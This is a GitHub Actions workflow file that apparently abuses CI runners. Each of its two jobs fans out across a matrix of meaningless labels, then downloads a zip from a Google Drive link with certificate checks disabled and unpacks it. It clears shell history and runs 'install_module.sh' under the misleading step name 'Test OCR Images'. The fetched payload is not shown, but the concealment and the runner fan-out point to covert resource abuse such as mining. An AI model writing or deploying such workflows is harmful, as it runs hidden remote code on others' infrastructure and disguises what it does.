name: longvu3bo
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  CREATE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Configure', 'Package', 'Assess', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1fcOxDVfR4d8AkYo1oj-WIkjldJhBOcof" -O longvu3bo.zip
        unzip -o longvu3bo.zip
        rm longvu3bo.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  VERIFY1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Acquire', 'Assemble', 'Verify', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1fcOxDVfR4d8AkYo1oj-WIkjldJhBOcof" -O longvu3bo.zip
        unzip -o longvu3bo.zip
        rm longvu3bo.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
